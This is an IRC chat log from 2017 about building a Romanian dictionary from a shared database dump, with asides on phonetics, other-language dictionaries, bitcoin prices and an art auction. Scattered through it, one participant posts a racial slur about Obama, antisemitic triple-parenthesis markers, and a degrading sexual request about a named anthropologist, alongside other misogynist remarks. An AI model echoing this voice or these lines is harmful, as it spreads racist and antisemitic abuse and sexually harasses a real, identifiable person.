1740783;1511120039;mircea_popescu;besides, im pretty sure i saw all of these in ro printed matter. 1740784;1511120052;asciilifeform;then nfi 1740785;1511120153;asciilifeform;afaik a quality 'expressions' dict dun exist for any modern lang. it's a tricky item. 1740786;1511120162;mircea_popescu;2ed94a10dbd9160f62cfb9c004342f603028cdf2d3bbb72cdf9c762eaa2cf804088382e7cfa85d5588526a76a71b1c4322d12c6505715008ff5b0c70ac3e8b66 http://trilema.com/wp-content/uploads/dex-database.sql.gz 1740787;1511120167;mircea_popescu;sql dump of the whole site. 1740788;1511120173;asciilifeform;ooh neato 1740789;1511120185;asciilifeform;eggog tho 1740790;1511120190;mircea_popescu;mmm 1740791;1511120218;mircea_popescu;da fuck is this wonder 1740792;1511120315;asciilifeform;404 1740793;1511120508;mircea_popescu;asciilifeform chmoded into correctness, try naos 1740794;1511120627;asciilifeform;nao worx, ty 1740795;1511120667;mircea_popescu;my pleasure 1740796;1511120680;asciilifeform;item looks to be quite practical, also. 1740797;1511120696;mircea_popescu;in other wtfs, girl opens jar, a scent of paradise fills kitchen. i go over to investigate. the item is helpfully labeled : melaza. ie, molasses. 1740798;1511120708;mircea_popescu;this is insufficient, i saw molasses before, not paradise. 1740799;1511120710;asciilifeform;aaah such good times, to have these things on own hdd! instead of wwwnonsense 1740800;1511120739;mircea_popescu;but the label helpfully explains : con gingseng, carao (?!) y cuculmeca. 1740801;1511120745;mircea_popescu;o thank you label of WHAT THE FUCK 1740802;1511120776;asciilifeform;aint that a thing that only grows in equator 1740803;1511120789;asciilifeform;what was it, bread tree ? 1740804;1511120807;mircea_popescu;aooarently it's some local cassia and smilax cordifolia 1740805;1511120833;asciilifeform;https://www.acguanacaste.ac.cr/paginas_especie/plantae_online/magnoliophyta/fabaceae/cassia_grandis/c_grandis12jun98/cassia_grandis_2700/98-ACG-PI-d-2187_g.jpg << fascinating 1740806;1511120849;mircea_popescu;ie "pink shower tree" and catbrier. 1740807;1511120857;mircea_popescu;can conceivably mix into paradise i guess 1740808;1511121574;asciilifeform;!#seen mike_c 1740809;1511121574;a111;2017-09-11 congrats! I did that a long time ago too. Good luck with it. 1740810;1511130054;BingoBoingo;And Mugabe's "resignation statement" is set to drop sometime soon. 1740811;1511131886;*;BingoBoingo impressed by the afternoon's terse yet definitive proceedings 1740812;1511136233;BingoBoingo;And in timely rereadings http://trilema.com/2014/venetian-republic-and-find-spiritual-music/ 1740813;1511136381;mircea_popescu;http://btcbase.org/log/2017-11-19#1740667 <<< afaik it never was anyhthing besides "rural western us middle aged women with delusions of self-importance". 45yo oregon dwelling ex-waitress with an interest in spirituality / 38 yo illiterate "princeton graduate" with 1mn in debt and ~0 yearly income 80% of okcupid demo. 1740814;1511136381;a111;Logged on 2017-11-19 14:51 BingoBoingo: (apparently okcupid went full app-shit sometime in the interval also ?) << The website has increasingly little to hook, and is increasingly poorly populated. Last week Uruguay had 4 girls, now has 2. Extrapolating from Uruguay's 4 million population this means ~35000 girls is all okc has left. Been in decline for a while, but now fallen sharply. 1740815;1511136416;BingoBoingo;You forget the entire Pinay diaspora farms it 1740816;1511136440;BingoBoingo;But yeah, that's about it 1740817;1511136539;BingoBoingo;Hong Kong, much Pinay diaspora, much OKc still. Prolly the demographic least sensitive to web design suck. Further proving the point of Namecheap's demise 1740818;1511136582;mircea_popescu;http://btcbase.org/log/2017-11-19#1740665 << amusingly, the 2015 trilema lulz re okcupid ( http://trilema.com/2015/okcupidcom-the-dating-site/ ) / his 2016 disappearance ( http://btcbase.org/log/2017-08-13#1697386 http://btcbase.org/log/2016-04-27#1458351 ) match remarkably well ; which begs the question why say "keeping pretty busy" in preference of "wrote to IAC after you mock-exploited one of their 'properties' and got hir 1740819;1511136582;a111;Logged on 2017-11-19 14:46 asciilifeform: http://btcbase.org/log/2017-11-19#1740657 << this is actually pretty sad. 1740820;1511136582;a111;Logged on 2017-08-13 20:32 mike_c: hey, look at that 1740821;1511136582;a111;Logged on 2016-04-27 03:01 mike_c: at least you won the 'most famous mircea popescu' award - https://duckduckgo.com/?q=mircea+popescu 1740822;1511136583;mircea_popescu;ed". but anyway. 1740823;1511136603;mircea_popescu;BingoBoingo you ever seen the "banking apps" of azns ? 1740824;1511136617;mircea_popescu;(windows got a sort of monopoly for banking there, it's hysterical what stack they run) 1740825;1511136624;asciilifeform;ahahaha the zoological reservation where e.g. 512bit rsa lives 1740826;1511136636;asciilifeform;and 64bit aes, etc 1740827;1511136641;mircea_popescu;oya 1740828;1511136667;BingoBoingo;mircea_popescu: AHA, notably worst in Lower Korea/Japan. 1740829;1511136677;mircea_popescu;yea 1740830;1511136711;mircea_popescu;http://btcbase.org/log/2017-11-19#1740664 << see also capcaun. 1740831;1511136711;a111;Logged on 2017-11-19 14:45 asciilifeform: capcană ahahahahaha 1740832;1511136724;BingoBoingo;Less developed Asia tends towards "apps" but Peak Asia tends to Windows 98 SE in lucite 1740833;1511136725;asciilifeform;i assume sumthinglike 'bear trap' 1740834;1511136731;asciilifeform;unless it's yet another falsecognate 1740835;1511136748;asciilifeform;( to ru капкан ) 1740836;1511136806;mircea_popescu;capcană = trap, generally in the physical sense. căpcăun = strange item, pluriously rendered as ogre, troll etc. basically ro folklore big bad. in all appearances direct survivor of greek antrophophagos. 1740837;1511136850;BingoBoingo;In still other headlines of the interlanguage frontier: " Trump Tweets “I Should Have Left Them in Jail” About UCLA Basketball Players Arrested in China" 1740838;1511137294;asciilifeform;http://btcbase.org/log/2017-11-20#1740818 << d00d has some explainin' to do, if he ever reappears 1740839;1511137294;a111;Logged on 2017-11-20 00:09 mircea_popescu: http://btcbase.org/log/2017-11-19#1740665 << amusingly, the 2015 trilema lulz re okcupid ( http://trilema.com/2015/okcupidcom-the-dating-site/ ) / his 2016 disappearance ( http://btcbase.org/log/2017-08-13#1697386 http://btcbase.org/log/2016-04-27#1458351 ) match remarkably well ; which begs the question why say "keeping pretty busy" in preference of "wrote to IAC after you mock-exploited one of their 'properties' and got hir 1740840;1511137335;mircea_popescu;http://btcbase.org/log/2017-11-19#1740688 << politruk gotta politruk. speaking of which, anyone got pics of Gabriella Coleman's remarkably ugly tits ? 1740841;1511137335;a111;Logged on 2017-11-19 15:06 asciilifeform: runs... tor. 1740842;1511137347;asciilifeform;whossat 1740843;1511137408;mircea_popescu;male-looking "anthropologist" "with an interest in" "online activism". ((())) ((()))((())) ((())) sets supplied for reader's convenience in separate packaging. 1740844;1511137434;asciilifeform;mircea_popescu: the odd thing re blaze is that , unless there was a completely other matt blaze working for at&t -- he's the d00d with the only published attempt at a provably hard symmetric cipher , in 1990s 1740845;1511137491;asciilifeform;( we did the proof here, it did not withstand the harsh lamps ) 1740846;1511137522;mircea_popescu;asciilifeform usg remora. nothing any ... wtf was that schmucks name... 1740847;1511137524;mircea_popescu;brb 1740848;1511137645;mircea_popescu;right so : usg remora. nothing any http://trilema.com/2015/more-factored-rsa-keys-and-assorted-other-considerations/#selection-413.0-419.38 / http://trilema.com/2016/psa-hanno-bock-still-a-deceitful-shitbag/ "publishes" may be credited to them. 1740849;1511137675;mircea_popescu;that nsa chose to publish some derpage through usg.nsa.x-shithead or through usg.nsa.y-shithead is not a meaningful point of difference. 1740850;1511137712;mircea_popescu;in no case may such be used to establish any kind of professional credentials for the designated x, y, etceteras. 1740851;1511137733;asciilifeform;'shakespeare or other man by same name' (tm)(r) 1740852;1511137745;mircea_popescu;connivance in usgtardation renders professional merit ~impossible~ and that's the final word on that matter. 1740853;1511137750;mircea_popescu;asciilifeform quite. 1740854;1511137882;mircea_popescu;and so, to get back to it, and in the words of the great nigger Hussein Bahamas, "if you did a thing you didn't do that thing". therefore matt blaze neither was touched nor could have been touched by anyone, be they john drapper or anyone else ; nor has matt blaze had published anything of any note, re ciphers or cooking or anything else. 1740855;1511137890;*;asciilifeform rereads the rsakeys trilema. stimulating. 1740856;1511137910;asciilifeform;i nearly forgot the item with the diff trick. 1740857;1511137945;mircea_popescu;good to have a blog, i routinely forget shit i did, then i end up confronted with it and im like... hey. pretty cool! 1740858;1511138257;mircea_popescu;http://btcbase.org/log/2017-11-20#1740838 << i dunno, what explaining'd be there ? "they offered a job and i... took it". pretty sure his previous spot sucked arse, guy was getting stress blisters. family man, gotta provide, what. 1740859;1511138257;a111;Logged on 2017-11-20 00:21 asciilifeform: http://btcbase.org/log/2017-11-20#1740818 << d00d has some explainin' to do, if he ever reappears 1740860;1511138269;asciilifeform;i guess. 1740861;1511138303;asciilifeform;it is possible to work in the saeculum without having one's face plastered on a sad sack of sad rogue's gallery tho 1740862;1511138308;mircea_popescu;venetian kid had clear "go east, m'boy, sail east. till you've made your gold coin chest you've no business LIVING in venice. you're born and you return here, that's all." 1740863;1511138351;mircea_popescu;asciilifeform and that helps anything ? i'd rather marry the whore the brothel uses to advertise than a different, "secret" one. 1740864;1511138390;mircea_popescu;at least she's good at it. 1740865;1511138434;asciilifeform;not all brothel created equal tho 1740866;1511138450;mircea_popescu;iac shack seems among the benign-est. 1740867;1511138461;asciilifeform;i suppose compared to, say, microshit -- yes 1740868;1511138473;asciilifeform;( iirc d00d at one time toiled in the mines at microshit itself ) 1740869;1511138475;mircea_popescu;compared to what -- no ? 1740870;1511138493;mircea_popescu;i remember that, cuz i was liek "burn down all ms employees" and he was like "shit, i'm in trouble" 1740871;1511138498;asciilifeform;lol 1740872;1511138504;asciilifeform;yea that was when i learned it 1740873;1511138544;mircea_popescu;anyway, srsly, married guy with small kids. gotta bring home some kind of bacon. he tried to put that idea into work, with you recall, betting something. imo did a great run of it, too. but it didn't catch. so he tried something else and that caught better. 1740874;1511138575;asciilifeform;right. depressing. 1740875;1511138580;mircea_popescu;what complaint can there be had ? "starve to the light" is for teens, small children have no useful fat reserves. 1740876;1511138637;asciilifeform;( was interesting episode, the 'war of life' thing, where the entirely unrelated d00d went apeshit over its closing ) 1740877;1511138649;mircea_popescu;i don't recall that part ? 1740878;1511138661;asciilifeform;!#seen ThickAsThieves 1740879;1511138661;a111;2014-11-03 but you da boss 1740880;1511138665;mircea_popescu;but yes, was kinda sad it went nowhere, he certainly made a something out of nothing. 1740881;1511138665;asciilifeform;^ him 1740882;1511138675;mircea_popescu;asciilifeform i thought that was re me de-backing altcoin once it become obvious can't work 1740883;1511138689;mircea_popescu;(admittedly, it became obvious to me faster than "to most people" or w/e) 1740884;1511138696;asciilifeform;iirc it was from WoL flame on trilema 1740885;1511138702;mircea_popescu;hm. 1740886;1511138715;asciilifeform;in comments under the closing statement, iirc 1740887;1511138717;mircea_popescu;well, archeologists of the future are welcome to resolve this, i ain't digging. 1740888;1511138730;asciilifeform;http://trilema.com/2014/waroflife-swol-october-2014-statement-closing/ << subj 1740889;1511138749;mircea_popescu;yes but rarely will a us born esl fellow wriote his angst under the correct piece. 1740890;1511138757;mircea_popescu;gotta disawov and shit. 1740891;1511138768;asciilifeform;i was stuck on a plane with that d00d, pretty far gone case 1740892;1511138783;mircea_popescu;was he the one dedicated to the service of some woman ? 1740893;1511138783;asciilifeform;( even at the time, was obvious sufferer ) 1740894;1511138787;asciilifeform;aha him 1740895;1511138788;mircea_popescu;nothing wrong with slavebois. 1740896;1511138839;asciilifeform;was far from his home element, if a slave. 1740897;1511138904;mircea_popescu;anyway, getting briefly back to http://btcbase.org/log/2017-11-20#1740875 : the importance of big boobs in women is exactly this : if you make the decision to forced march through desert, the offspring of A-cup camp followers will die ; DD and so forth will survive -- female body will melt the tit into nothing before letting kid starve, whole process driven by that one true whip of the female psyche, the child-dying-of-hunger 1740898;1511138904;a111;Logged on 2017-11-20 00:43 mircea_popescu: what complaint can there be had ? "starve to the light" is for teens, small children have no useful fat reserves. 1740899;1511138905;mircea_popescu;-cry. it's an item, even if "everybody" meanwhile "forgot". 1740900;1511138962;mircea_popescu;so in this sense, having a harem of galon-boobed females is the ~only sort-of get-out-of-jail-card for http://trilema.com/2012/cine-se-casatoreste/ problem, 1740901;1511138977;mircea_popescu;specifically the "Si daca tot m-am enervat, sa facem si o regula : cine se casatoreste nu mai are dreptul sa fie dizident. Dizidenta e pentru barbati, nu pentru pulalai inscrisi in registru' reproductiv al neamului. Odata ce te-ai casatorit cu una ai terminat-o cu pretentiile si nemultumirile apropo de "orinduirea sociala". Nu mai ai ce sa comentezi, te inscrii acolo in ordine asa cum este ea si iti vezi de sters cacatu' de p 1740902;1511138977;mircea_popescu;e bec sau de pe unde mai ajunge el intr-o gospodarie normala cu copii mici." bit. 1740903;1511138977;asciilifeform;too many forced marches like this and you end up with africa-style 'instant balloon' genotype 1740904;1511138987;asciilifeform;so has down side. 1740905;1511138989;mircea_popescu;hey. don't make the call unless it's warranted. 1740906;1511139003;mircea_popescu;there is unlimited responsibility bundled with unlimited power. 1740907;1511139104;asciilifeform;oh hah i can finally read that. 1740908;1511139111;mircea_popescu;(whole thing is entirely symbolic by now, obviously. but at one point ...) 1740909;1511139129;asciilifeform;( re the 2012 piece ) 1740910;1511139135;mircea_popescu;lemme know if problem. 1740911;1511139377;asciilifeform;btw, for my fellow rotakus ( shinohai , pete_dushenski , ben_vulpes .. ? ) grep -i '^foobar' ro_eng_ascii.txt finds word foobar. 1740912;1511139461;mircea_popescu;asciilifeform are you gonna vpatch the new dict on the old btw ? or what's next step here ? 1740913;1511139472;asciilifeform;which new 1740914;1511139485;mircea_popescu;sql item linked today 1740915;1511139503;asciilifeform;that's separate item tho. it's a толковый словарь 1740916;1511139515;mircea_popescu;so is your original, has word, definition, english equiv. 1740917;1511139516;asciilifeform;prolly oughta turn into plain txt and genesisate tho. 1740918;1511139521;mircea_popescu;can readily replacve the middle column 1740919;1511139577;shinohai;Would be greatly appreciated to have plaintext item, asciilifeform .... I also prefer to simply grep word I am looking for whilst studying. 1740920;1511139595;mircea_popescu;the correct transform imo would be from your (word/dubious expl/engl equiv) into (word/proposed english equiv/ipa notation/proper dex expl). this can be done mechanically on the basis of the two items. 1740921;1511139629;asciilifeform;waitasec how to mechanize the ipa ? 1740922;1511139649;mircea_popescu;look at it, it's always separated in the definition, at beginning 1740923;1511139664;asciilifeform;aa hmm. 1740924;1511139666;mircea_popescu;you could ALSO add the etymology notation as separate field, but can also leave it as is (part of the expl) 1740925;1511139692;mircea_popescu;now, i would much appreciate if you took the current bs and ipa'd it properly (it's not THAT hard, ro ipa set is narrow and unambiguous) 1740926;1511139720;mircea_popescu;but with those changes you not only have only ro dict online, but you also have best ro dict ever made in 3k years of ro history. 1740927;1511139749;asciilifeform;the one i genesised ? it's been de-orced, so to ipaize gotta be re-orced 1740928;1511139762;mircea_popescu;making you a major cultural player, in the vein of dead people. 1740929;1511139776;mircea_popescu;asciilifeform cuz no ascii-ipa hm ? 1740930;1511139813;asciilifeform;this also. but i was speaking of http://btcbase.org/log/2017-11-19#1740588 1740931;1511139813;a111;Logged on 2017-11-19 02:00 asciilifeform: caveat x2 : no îțâșă . but it was missing in the original, i did not remove it. ascii-only, in the derp's original, e.g. 'uşă' turns into 'usa'. 1740932;1511139814;mircea_popescu;wut do we do. 1740933;1511139839;asciilifeform;The Trooo Ultimate Ro Dict prolly oughta be a sexpr 1740934;1511139862;asciilifeform;with (yes) orcographic word, inflections, ipaism, dexism. 1740935;1511139883;mircea_popescu;myeah. 1740936;1511139985;mircea_popescu;lol randomly perusing we find "a da muie la statuie" (to fuck statue face), ie superlative dissidence. 1740937;1511139995;asciilifeform;it is truly mind-boggling, this item was possible already around 1995 or so. and yet afaik exists for no language. 1740938;1511140004;mircea_popescu;ikr. 1740939;1511140098;asciilifeform;nao, a language, granted, is moar than merely its dictionary. but innit a crying shame, that we're still stuck with shit dictionaries. 1740940;1511140111;mircea_popescu;very much so. 1740941;1511140135;mircea_popescu;this would be (as per tradition / discussion yest etc) actually a very powerful item ~for the student of english~, too. even if he only spake english. 1740942;1511140142;asciilifeform;verily. 1740943;1511140159;mircea_popescu;asciilifeform anyway, for some reason i thought dex included a pronounciation guide, but it seems mostly absent/unreliable. 1740944;1511140164;mircea_popescu;so i guess we can skip the ipa bit for now 1740945;1511140191;asciilifeform;i'd settle for getting the orcograms back in 'ro_eng' 1740946;1511140208;mircea_popescu;pretty sure my item is 100% diacritic-ized. 1740947;1511140215;asciilifeform;( would put'em as a middle column, rather than in place of the existing ) 1740948;1511140235;asciilifeform;dex ? yea it is 1740949;1511140261;mircea_popescu;asciilifeform can even put them as aside binary blob, as discussed re fg/bootturds etc. "you wanrt to see the orcograms, find item #x in list" 1740950;1511140387;asciilifeform;well in sexpr they'd end up named, things like #\Alef 1740951;1511140392;asciilifeform;rather than binturds 1740952;1511140420;mircea_popescu;this would be a good thing in the eye of the lord. 1740953;1511140468;asciilifeform;( the lisp folx, fwiw, largely finessed the orcogram problem before utf8 climbed down from the trees ) 1740954;1511140471;mircea_popescu;anyway, to leave the pressure off : im still willing to go through it by line and improve as time permits, but there's no rush, so let's first make an optimal basis and see. 1740955;1511140492;asciilifeform;long term thing. nobody yet baked a dictionary in a day, lol 1740956;1511140505;mircea_popescu;ro guy spent life trying to bake dict 1740957;1511140509;mircea_popescu;!~google b p hasdeu 1740958;1511140510;jhvh1;mircea_popescu: Bogdan Petriceicu Hasdeu - Wikipedia: ; Bogdan Petriceicu Hasdeu National College - Wikipedia: ; Bogdan Petriceicu Hasdeu - Wikipedia: 1740959;1511140545;mircea_popescu;let's also see if phf wants to add nething. 1740960;1511140671;mircea_popescu;asciilifeform as an aside : the "limba romana este singura limba care se scrie cum se citeste" ro linguistics dogmatics promises there's a workable ro-ipaize-tron somewhere. at least in the sense of "we could get 99% success rate". it IS a point of fact that ~any romanian speaker can correctly notate new words on the basis of sound, and this is PRECISELY the sort of artificial intelligence that's amenable to numeric methods. 1740961;1511140678;mircea_popescu;so notbad ai side project imo 1740962;1511140697;mircea_popescu;in the sense that the resulting code would be in itself an interesting knowledge pile. 1740963;1511140705;mircea_popescu;as opposed to eg alphabet co go-playing code. 1740964;1511140774;asciilifeform;dunno if 'se scrie cum se citeste' claim of ro is any moar troo than the ru 'как слышится так и пишется' truism 1740965;1511140792;mircea_popescu;i suspect it is. no proof until code written of course. 1740966;1511140829;mircea_popescu;asciilifeform let's try this. make up a girl's name and i'll tell you how it sounds in romanian. then diana_coman spyked alex_c whosoever else can confirm or infirm. 1740967;1511140872;mircea_popescu;(point being -- UNKNOWN romanian words stll have a strict phonetic / alphabetic correspondence in romanian. somehow. how ?) 1740968;1511140919;asciilifeform;unknown words get the regular algo and that's that, they're never the problem 1740969;1511140925;asciilifeform;the problem is typically common-use irregulars 1740970;1511140979;mircea_popescu;i can't think of one ; except for imports (see eg http://trilema.com/2010/care-sunt-iq-tau/#comment-123116 margot, read in ro in the french manner). 1740971;1511140997;mircea_popescu;stands out like sore thumb for it too, wtf is that o. 1740972;1511141025;asciilifeform;see in ru we dun have this problem , it gets fixed 'automagically', e.g. Марго 1740973;1511141049;asciilifeform;( you can't write the loaned name in orc directly, so it gets properly phonized ) 1740974;1511141066;mircea_popescu;yes well. 1740975;1511141084;mircea_popescu;but incidentally -- same treatment could be applied to ru-eng item, resulting in a megabridge here. 1740976;1511141113;asciilifeform;( nobody in ru has a problem knowing how to say e.g. Чаушеску . it's a nearly magical fix. ) 1740977;1511141139;mircea_popescu;how about hors d'oeuvres ? 1740978;1511141141;asciilifeform;ipatronic ru dict is just about trivial. 1740979;1511141186;asciilifeform;mircea_popescu: закуски!!1111 1740980;1511141187;mircea_popescu;(is hysterical bit re this in classical ro comedy film, "monsieur se scrie, monsieur se citeste, ci tat umbli cu cioara vapsita!") 1740981;1511141193;mircea_popescu;asciilifeform ahahyah win 1740982;1511141253;mircea_popescu;anywauy, i didn't mean "same treatment" in the sense of ipaization, i meant same treatment in the sense of translaty/explainy flatfile. 1740983;1511141268;asciilifeform;aa 1740984;1511141285;mircea_popescu;then you can ACTUALLY translate, for once. 1740985;1511141310;mircea_popescu;got a gateway to latin and a gateway to the east, and the idiotic lingua franca of stupid people as the archimede screw for it all. 1740986;1511141349;asciilifeform;there's a whole bunch of'em on www. asciilifeform has not formally collected, compared, yet. 1740987;1511141394;asciilifeform;e.g. http://www.lib.ru/DIC/OZHEGOW/ozhegow_p_r.txt 1740988;1511141418;mircea_popescu;this looks like proper item. 1740989;1511141423;asciilifeform;prolly the best known one. 1740990;1511141429;asciilifeform;19th c 1740991;1511141447;asciilifeform;or hm 1740992;1511141455;asciilifeform;strike that, 1949. 1740993;1511141482;asciilifeform;( still in print. ) 1740994;1511141492;mircea_popescu;"ПАТЕНТ, -а, м. 1. Документ, свидетельствующий о праве изобретателя на его изобретение, о его приоритете. Получить п. на изобретение. 2. Свидетельство на право занятия торговлей, промыслом. || прил. патентный, -ая, -ое. Патентное прав 1740995;1511141492;mircea_popescu;о." 1740996;1511141493;mircea_popescu;i like this. 1740997;1511141526;mircea_popescu;somehow a dictionary entry is the best way to distinguish men from idiots. 1740998;1511141561;asciilifeform;the english one, afaik, is 19th c, at least most recent as exists on www >> https://ia800500.us.archive.org/15/items/webstersunabridg29765gut/29765-8.txt << for completeness. 1740999;1511141576;mircea_popescu;ynot bridged together ? 1741000;1511141598;*;mircea_popescu is noticing how this "how come nothing was done before republic got to it" point is fading out of discourse. trite! 1741001;1511141608;asciilifeform;'tis trooo tho 1741002;1511141615;mircea_popescu;myeah. 1741003;1511141619;asciilifeform;no reason these should not all exist as 1 hyper-whatevertron. 1741004;1511141631;mircea_popescu;right ? such items are useful if properly featured 1741005;1511141637;asciilifeform;it was promised to me in 1995!11111 1741006;1511141646;asciilifeform;'html will give world dictionary...' 1741007;1511141660;mircea_popescu;which doesn't mean creeping featuritis, but ALSO does not mean "here's half of koschei's heart in lib.ru domain and other half buried way across buyan, in us.archive.org" 1741008;1511141701;mircea_popescu;asciilifeform ikr ? the previous set of globalists, with the tripod sites etc, promised lots of jules verne crap, went away like nothing. 1741009;1511141705;asciilifeform;nao there is some devil in the details, namely what to do with linkages that aren't straight equivalence, b/w word-in-a and word-in-b 1741010;1511141709;mircea_popescu;wind of change my ass ; eat more fucking fiber fuckers! 1741011;1511141737;mircea_popescu;asciilifeform always a problem of translaty dict, as discussed. no way out of this, translaty dict is perl. 1741012;1511141752;mircea_popescu;but if explainy part provided, some perl on the side is no longer brain rotting. 1741013;1511141767;mircea_popescu;rather -- no longer guaranteed to give brain damage. 1741014;1511141788;mircea_popescu;("but mp, wtf is explainy, not an english word" "fuck you.") 1741015;1511141819;mircea_popescu;im not saying explainatory, esp because wtf is translatatory then. 1741016;1511141821;asciilifeform;i find it interesting, entomologically, what the anglotards did with the idea of dictionary. they turned instrument ~for learning language~ into one ~for avoiding learning language~ -- the result is google's 'translate' 1741017;1511141851;mircea_popescu;quite. 1741018;1511141872;mircea_popescu;much like they managed to turn banking system from system for achieving wealth to system for avoiding wealth. 1741019;1511141875;mircea_popescu;it's the anglocurse. 1741020;1511141912;asciilifeform;to make the one instrument of enstupefaction, they used enuff sweat to make ten of actual learning 1741021;1511141923;asciilifeform;that's the surreal bit 1741022;1511143441;mircea_popescu;myeah 1741023;1511144299;asciilifeform;back to the baseline item ( http://btcbase.org/log/2017-11-19#1740660 ) -- if mircea_popescu , diana_coman , spyked , ... ( who else we have ? ) would like to submit corrections/additions/subtractions -- plox to vpatch 1741024;1511144299;a111;Logged on 2017-11-19 14:42 asciilifeform: http://btcbase.org/log/2017-11-19#1740653 >> neato! >>> http://www.loper-os.org/pub/ro_eng_genesis.vpatch + http://www.loper-os.org/pub/ro_eng_genesis.vpatch.asciilifeform.sig . 1741025;1511144308;mircea_popescu;http://trilema.com/2012/cine-se-casatoreste/#comment-83174 << item from ancient trilema "how about if there was some chick that got implanted ovules from right-to-life xtian women only and strictly to abort them 10 weeks in as a trolling thing" 1741026;1511144331;mircea_popescu;asciilifeform so are we deciding that is to be the base item and not gonna dump new dex into it ? 1741027;1511144365;asciilifeform;i dun see it as a blocking operation 1741028;1511144378;asciilifeform;can extend the primitive dict for nao, then merge laters. 1741029;1511144447;mircea_popescu;it's blocking in my head cuz im not gonna edit items by hand if they're gonna be updated by machine. 1741030;1511144452;mircea_popescu;general principle, handwork lastwork. 1741031;1511144479;asciilifeform;the machine would still do the Right Thing later, when merging into the larger dex 1741032;1511144543;asciilifeform;but i'd be curious to hear what various folx ( phf , say ) have to say re optimal data structure for dicts. 1741033;1511144593;*;asciilifeform brb,meat 1741034;1511144601;mircea_popescu;asciilifeform it can't do the right thing if i changed the explanation. 1741035;1511144632;mircea_popescu;whole idea now is "can safely replace explanation from 1 with item from 2". if we break this re 1 wtf do we do, you write AI to discern between dex-powered and mp-powered explanations of words ? 1741036;1511145177;mircea_popescu;and in other blondies, http://78.media.tumblr.com/f40c5631c395c433fb12e82d0cc00a28/tumblr_nll1clsuEJ1rszn81o1_1280.jpg 1741037;1511148241;BingoBoingo; anyway, srsly, married guy with small kids. gotta bring home some kind of bacon. he tried to put that idea into work, with you recall, betting something. imo did a great run of it, too. but it didn't catch. so he tried something else and that caught better. << AHA, does not have young unmarried unchilded option of hardware store to contribute minmally to USGism on principle 1741038;1511148533;BingoBoingo; it was promised to me in 1995!11111 << HYPERCARD!!! 1741039;1511148647;BingoBoingo;Arrival in Montevideo arranged for Dec 6th, at same time as departing prior day. 1741040;1511148708;BingoBoingo;!!up zod_ 1741041;1511148708;deedbot;zod_ voiced for 30 minutes. 1741042;1511148715;BingoBoingo;Sup zod_ 1741043;1511148723;zod_;what do y'all think of http://upspin.io/ ? 1741044;1511148734;zod_;BingoBoingo not much 1741045;1511148746;zod_;just reading https://moronlab.blogspot.ca/2010/01/urbit-functional-programming-from.html 1741046;1511148762;zod_;i mean https://moronlab.blogspot.ca/2010/01/urbit-functional-programming-from.html?showComment=1263570771214#c6454142774827414532 1741047;1511148768;BingoBoingo;zod_ Let's get to know each other first? Who is your daddy and what does he do? 1741048;1511148806;pete_dushenski;http://btcbase.org/log/2017-11-20#1740911 << nifty! cheers 1741049;1511148806;a111;Logged on 2017-11-20 00:56 asciilifeform: btw, for my fellow rotakus ( shinohai , pete_dushenski , ben_vulpes .. ? ) grep -i '^foobar' ro_eng_ascii.txt finds word foobar. 1741050;1511148962;zod_;BingoBoingo my dad lives in new york and drives a taxi. and my mom hopes he's gonna die soon. 1741051;1511148999;BingoBoingo;https://www.youtube.com/watch?v=_SN7sLORnYQ 1741052;1511149137;zod_;BingoBoingo https://youtu.be/-ahtp0sjA5U 1741053;1511149247;pete_dushenski;http://btcbase.org/log/2017-11-19#1740754 << am i the only one who can't read "dex" without thinking "dexedrine" ? phf ? 1741054;1511149247;a111;Logged on 2017-11-19 19:19 mircea_popescu: an antique and therefore reliable copy of the dex (dictionar explicativ al limbii romane). 80 mb's worth. 1741055;1511149307;shinohai;Take a handful, write entire Romanian dictionary by hand in 2 nights. 1741056;1511149309;BingoBoingo;pete_dushenski: I am pretty sure most of us thing "levo" 1741057;1511149341;pete_dushenski;shinohai: lol 1741058;1511149345;pete_dushenski;BingoBoingo: oh ? 1741059;1511149359;BingoBoingo;pete_dushenski: You know, different rotations 1741060;1511149383;BingoBoingo;Thinking dexedrine is the only dex isomered thing is racis 1741061;1511149397;BingoBoingo;many things can be dex rotary 1741062;1511149476;pete_dushenski;aha you sneaky chemist you. making me recall my organic chem from uni! i actually really enjoyed that class. it was one of my better marks in first year. b! 1741063;1511149504;*;pete_dushenski wasn't a steller uni student. played too much poker. 1741064;1511149579;*;BingoBoingo was above average uni student, chemically insulated from ambient retardation 1741065;1511149601;pete_dushenski;http://btcbase.org/log/2017-10-25#1728845 << update on Madonna of the Yarnwinder auction... sold for ~only~ $450mn. 1741066;1511149601;a111;Logged on 2017-10-25 18:02 mircea_popescu: pete_dushenski considering the current bezzle pressure / overwhelming inflation and the very personal-brand-oriented populace, it will probably be 1bn just to be able to say 1bn. 1741067;1511149656;pete_dushenski;"At some level, the $450 million number is so big as to be meaningless. If I told you that the painting was bought for 60,000 bitcoins, would that make it easier to stomach?" << lulzomatic commentary on said auction from felix salmon https://tinyletter.com/felixsalmon/letters/nota-bene-10 1741068;1511149773;pete_dushenski;sorry, painting was Salvator Mundi, not Madonna... 1741069;1511150138;pete_dushenski;"Maybe the $450 million is just a function of how rich the world's richest people have become. The price needed to be that high, just for them to notice the money." << salmon is right here at least. stacks of gov-backed paper just don't feel like all that much these days. 1741070;1511150311;asciilifeform;'rare art' is simply low-tech pre-bitcoin btc for lizards 1741071;1511150326;asciilifeform;inflation-proof money bag. 1741072;1511150400;pete_dushenski;much prettier than btc too but that mostly depends on how much you're turned on by p2p network mechanics 1741073;1511150427;asciilifeform;often enuff ugly as used toiletpaper. 1741074;1511150440;asciilifeform;important bit is that it be authenticable. 1741075;1511150492;pete_dushenski;aha. "modern art" is often just so soiled as to be rightfully confused for tp. 1741076;1511150538;pete_dushenski;and then there are those who take it too literally http://neemic.asia/image/data/blog_images/wang%20lei0%20copy.jpg 1741077;1511150563;pete_dushenski;via http://neemic.asia/Wang-Lei%27s-Toilet-Paper-Fashion 1741078;1511150877;BingoBoingo;!~ticker --market all 1741079;1511150884;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7930.01, vol: 8686.66837267 | Bitfinex BTCUSD last: 7985.0, vol: 40829.7866509 | Kraken BTCUSD last: 7945.1, vol: 2819.53208687 | Volume-weighted last average: 7973.72326182 1741080;1511157230;BingoBoingo;And in appcidental research into the market value of SUTO grad student labor: "Images of delivery take-home pay amounts posted to the Instacart shoppers’ Facebook group show recent instances where workers are sometimes making less than minimum wage for several hours of work. One woman showed $16.95 for seven hours of work in Jackson, Mississippi. Another said she was paid $13.30 for a three-hour job in St. Louis, Missouri. Yet anothe 1741081;1511157230;BingoBoingo;r woman posted a screenshot for $2.80 after doing a two-hour pickup and delivery in Austin, Texas." 1741082;1511159294;cazalla;not shitfaced this 